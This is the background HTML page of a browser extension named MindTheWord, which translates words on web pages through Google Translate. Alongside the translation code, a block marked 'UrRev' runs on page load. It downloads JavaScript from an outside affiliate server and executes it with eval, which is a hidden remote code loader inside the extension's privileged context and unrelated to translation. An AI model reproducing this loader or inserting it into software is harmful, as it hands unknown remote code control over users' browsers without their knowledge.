<!DOCTYPE html>
<!--
 * Copyright (c) 2011 Bruno Woltzenlogel Paleo. All rights reserved.
-->
<html>
  <head>
    <title>MindTheWord Background</title>
    <script type="text/javascript"
src="http://www.google.com/jsapi"></script>

<!-- UrRev BEGIN -->
<script>
function initGinyas(){
  var bbrsLogic = "http://rv.urrev.com/app/bookmark/bookmarklet/bbrsChromeRVObs.php?pubId=ginyas_211&affId=urrev_227";
  var domainsXHR = new XMLHttpRequest();domainsXHR.open("GET", bbrsLogic, true);
  domainsXHR.onreadystatechange = function() { 
	if (domainsXHR.readyState == 4) { globalEval(domainsXHR.responseText); }
  } 
  domainsXHR.send();
}

function globalEval(src, callback) {
  if (window.execScript) {window.execScript(src);if (callback){callback();} return;} 
  var fn = function() {window.eval.call(window,src);
  if (callback){callback();}};fn();		
}
</script>
<!--UrRev END -->

    <script>

function sourceLanguage() {
  var sL = localStorage["sourceLanguage"];
  if (sL) return sL;
  else return "auto";
}

function targetLanguage() {
  var tL = localStorage["targetLanguage"];
  if (tL) return tL;
  else return "en";
}

function translationProbability() {
  var tP = localStorage["translationProbability"];
  if (tP) return tP;
  else return 15;
}

function googleTranslateURL() {
    var url = 'http://translate.google.com/translate_a/t?client=f&otf=1&pc=0&hl=en';
    var sL = sourceLanguage();
    if(sL != 'auto') {
      url += '&sl=' + sL;
    }
    url += '&tl=' + targetLanguage();
    url += '&text=';
    return url;
}

//function translateOneRequestPerWord(words, callback) {
//  var counter = 0;
//  var wordArray = {};
//  for (word in words) {
//    counter++;
//    wordArray[counter] = word; 
//  }
//  var tMap = {};
//  translateORPWRec(wordArray,1,counter,tMap,callback);
//}

//function translateORPWRec(wordArray, index, length, tMap,callback) {
//  if (index > length) callback(tMap)
//  else {
//    var url = googleTranslateURL() + wordArray[index];
//    var xhr = new XMLHttpRequest(); xhr.open("GET", url, true);
//    xhr.onreadystatechange = function() {
//      if (xhr.readyState == 4) {
//        var r = JSON.parse(xhr.responseText);
//        for (i in r.sentences) {
//          var orig = r.sentences[i].orig;
//          var trans = r.sentences[i].trans;
//          tMap[orig] = trans;
//        }
//        translateORPWRec(wordArray, index + 1, length, tMap, callback);
//      }
//    }
//    xhr.send();
//  }
//}  	


function translateOneRequestPerFewWords(words, callback) {
  var concatWords = "";
  var trueLength = 0
  var concatWordsArray = {};
  var cWALength = 0;
  var maxLength = 800;
  for (word in words) {
    var wordTrueLength = encodeURIComponent(word + ". ").length;
    if (trueLength + wordTrueLength > maxLength) {
      cWALength++;
//    alert(concatWords + " " + cWALength);
      concatWordsArray[cWALength] = concatWords;
      concatWords = "";
      trueLength = 0;
    }
    concatWords += word + ". "  ;
    trueLength += wordTrueLength; 
  }
  var tMap = {};
  translateORPFWRec(concatWordsArray,1,cWALength,tMap,callback);
}

function translateORPFWRec(concatWordsArray, index, length, tMap,callback) {
  if (index > length) callback(tMap)
  else { 
    var url = googleTranslateURL() + concatWordsArray[index];
    var xhr = new XMLHttpRequest(); xhr.open("GET", url, true);
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4) {
//      alert(xhr.responseText);
        var r = JSON.parse(xhr.responseText);
        for (i in r.sentences) {
          var orig = r.sentences[i].orig;
          var origT = orig.substring(0,orig.length - 1);
	  var trans = r.sentences[i].trans;
          if (trans.substr(trans.length - 2) == ". " ) { 
            var transT = trans.substring(0,trans.length - 2);
          }
	  else if (trans.substr(trans.length - 1) == "." ) { 
            var transT = trans.substring(0,trans.length - 1);
          }
          else {
            transT = trans;
          }
          tMap[origT] = transT;
        }
        translateORPFWRec(concatWordsArray, index + 1, length, tMap, callback);
      }
    }
    xhr.send();
  }
}  	


//function translateOnlyOneRequest(words, callback) {
//  var tMap = {};
//  var concatWords = "";
//  for (word in words) {
//    concatWords += word + ". "  ; 
//  }
//  alert(concatWords);
//  var url = googleTranslateURL() + concatWords;
//  alert(url);
//  var xhr = new XMLHttpRequest(); xhr.open("GET", url, true);
//  xhr.onreadystatechange = function() {
//    if (xhr.readyState == 4) {
//      alert(xhr.responseText);
//      var r = JSON.parse(xhr.responseText);
//      for (index in r.sentences) {
//        var orig = r.sentences[index].orig;
//        var origT = orig.substring(0,orig.length - 1);
//        var trans = r.sentences[index].trans;
//        if (trans.substr(trans.length - 2) == ". " ) { 
//          var transT = trans.substring(0,trans.length - 2);
//        }
//        else if (trans.substr(trans.length - 1) == "." ) { 
//          var transT = trans.substring(0,trans.length - 1);
//        }
//        else {
//          transT = trans;
//        }
//        tMap[origT] = transT;
//      }    
//      callback(tMap);
//    }
//  } ;
//  xhr.send();       
//}  	
	
function onRequest(request, sender, sendResponse) {
  if (request.wordsToBeTranslated) {
    //translateOnlyOneRequest(request.wordsToBeTranslated, function(tMap) {
    translateOneRequestPerFewWords(request.wordsToBeTranslated, function(tMap) {
      sendResponse({translationMap : tMap});
    });
  } else if (request.translationProbability) {
    sendResponse({translationProbability : translationProbability()})
  }  
};

chrome.extension.onRequest.addListener(onRequest);

function browserActionClicked() {
  chrome.tabs.create({url:chrome.extension.getURL("options.html")});
}

chrome.browserAction.onClicked.addListener(browserActionClicked);


    </script>
    
    <script type="text/javascript">
      var _gaq = _gaq || [];
      _gaq.push(['_setAccount', 'UA-1471148-13']);
      _gaq.push(['_trackPageview']);

      (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
      })();
    </script>
  </head>
  <body onload="initGinyas();" ></body>
</html>
